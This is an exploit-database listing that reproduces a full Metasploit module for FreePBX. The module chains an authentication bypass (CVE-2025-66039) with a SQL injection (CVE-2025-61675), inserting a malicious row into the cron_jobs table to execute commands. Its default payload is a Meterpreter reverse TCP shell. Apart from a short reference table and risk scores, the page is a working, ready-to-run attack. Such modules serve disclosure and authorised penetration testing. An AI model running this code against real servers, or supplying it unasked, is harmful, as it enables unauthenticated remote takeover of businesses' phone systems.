📄 FreePBX Endpoint SQL Injection / Remote Code Execution

🗓️ 29 Jan 2026 00:00:00Reported by Noah King, msutovsky-r7Type

packetstorm🔗 packetstorm.news👁 176 Views

FreePBX authentication bypass and injection flaws enable unauthenticated remote code execution via cron_jobs.

Reporter	Title	Published	Views	Family All 35
GithubExploit	Exploit for CVE-2025-61675	16 Dec 202506:03	–	githubexploit
GithubExploit	Exploit for CVE-2025-61675	14 Dec 202507:57	–	githubexploit
ATTACKERKB	CVE-2025-66039	9 Dec 202521:32	–	attackerkb
ATTACKERKB	CVE-2025-61675	14 Oct 202519:30	–	attackerkb
Circl	CVE-2025-61675	14 Dec 202515:00	–	circl
Circl	CVE-2025-66039	11 Dec 202520:39	–	circl
CNNVD	FreePBX Endpoint Manager SQL注入漏洞	14 Oct 202500:00	–	cnnvd
CNNVD	FreePBX Endpoint Manager 授权问题漏洞	9 Dec 202500:00	–	cnnvd
CVE	CVE-2025-61675	14 Oct 202519:30	–	cve
CVE	CVE-2025-66039	9 Dec 202521:32	–	cve

##
    # This module requires Metasploit: https://metasploit.com/download
    # Current source: https://github.com/rapid7/metasploit-framework
    ##
    
    class MetasploitModule < Msf::Exploit::Remote
      Rank = ExcellentRanking
    
      include Msf::Exploit::Remote::HttpClient
    
      def initialize(info = {})
        super(
          update_info(
            info,
            'Name' => 'FreePBX endpoint SQLi to RCE',
            'Description' => %q{
              FreePBX is an open-source IP PBX management tool that provides a modern phone system for businesses that use
              VoIP to make and receive phone calls. Versions before 16.0.44 and 17.0.23 are vulnerable to CVE-2025-66039,
              while versions before 16.0.92 and 17.0.6 are vulnerable to CVE-2025-61675. The former represents an
              authentication bypass: when FreePBX uses Webserver Authorization Mode (an option the admin can enable), it
              allows an attacker to authenticate as any user. The latter CVE describes multiple SQL injections; this module
              exploits the SQL injection in the custom extension component. The module chains these vulnerabilities into an
              unauthenticated SQL injection attack and gains remote code execution by injecting an SQL record into th
              cron_jobs table. The cron_jobs database contains cron tasks that FreePBX executes in the context of the
              operating system.
            },
            'License' => MSF_LICENSE,
            'Author' => [
              'Noah King', # research
              'msutovsky-r7', # module
            ],
            'References' => [
              [ 'CVE', '2025-66039'], # Authentication Bypass
              [ 'CVE', '2025-61675'], # SQL injections
              [ 'URL', 'https://horizon3.ai/attack-research/the-freepbx-rabbit-hole-cve-2025-66039-and-others/']
            ],
            'Platform' => ['linux'],
            'Arch' => ARCH_CMD,
            'Targets' => [
              [
                'Unix Command',
                {
                  'DefaultOptions' =>
                  {
                    'Payload' => 'cmd/linux/http/x64/meterpreter/reverse_tcp',
                    'WfsDelay' => 70 # cronjob may take up to a minute to start
                  }
                }
              ]
            ],
            'Privileged' => false,
            'DisclosureDate' => '2025-12-11',
            'DefaultTarget' => 0,
            'Notes' => {
              'Stability' => [CRASH_SAFE],
              'Reliability' => [REPEATABLE_SESSION],
              'SideEffects' => [ARTIFACTS_ON_DISK, IOC_IN_LOGS]
            }
          )
        )
    
        register_options(
          [
            OptString.new('USERNAME', [true, 'A valid FreePBX user']),
          ]
        )
      end
    
      def sqli_custom_extension(payload)
        send_request_cgi({
          'uri' => normalize_uri('admin', 'config.php'),
          'method' => 'POST',
          'headers' => {
            'Authorization' => basic_auth(datastore['USERNAME'], Rex::Text.rand_text_alphanumeric(6))
          },
          'vars_get' => {
            'display' => 'endpoint',
            'view' => 'customExt'
          },
          'vars_post' => {
            'id' => payload
          }
        })
      end
    
      def check
        res = sqli_custom_extension(%('))
        if res&.code == 500
          return Exploit::CheckCode::Vulnerable('Detected SQL injection with authentication bypass')
        end
    
        Exploit::CheckCode::Safe('No SQL injection detected, target is patched')
      end
    
      def exploit
        @job_name = Rex::Text.rand_text_alpha(8..12)
    
        rce_payload = 'INSERT INTO cron_jobs (modulename,jobname,command,class,schedule,max_runtime,enabled,execution_order)'
        rce_payload += " VALUES ('sysadmin','#{@job_name}','#{payload.encoded}',NULL,'* * * * *',30,1,1)"
    
        res = sqli_custom_extension(%(1';#{rce_payload} -- ))
    
        if res&.code == 401
          print_good("Created cronjob with job name: '#{@job_name}'")
          print_status('Waiting for cronjob to trigger...')
        else
          fail_with(Failure::PayloadFailed, 'Cronjob was not created.')
        end
      end
    
      def cleanup
        super
    
        return unless @job_name
    
        # Remove the created cronjob
        res = sqli_custom_extension(%('; DELETE FROM cron_jobs WHERE jobname='#{@job_name}' -- ))
    
        print_status('Attempting to perform cleanup')
    
        if res&.code == 401
          print_good('Cronjob removed.')
        else
          print_bad("Cronjob #{@job_name} not removed, please perform manual cleanup!")
        end
      end
    end

29 Jan 2026 00:00Current

6.5Medium risk

Vulners AI Score6.5

CVSS 49.3

CVSS 3.19.8

EPSS0.16041

SSVC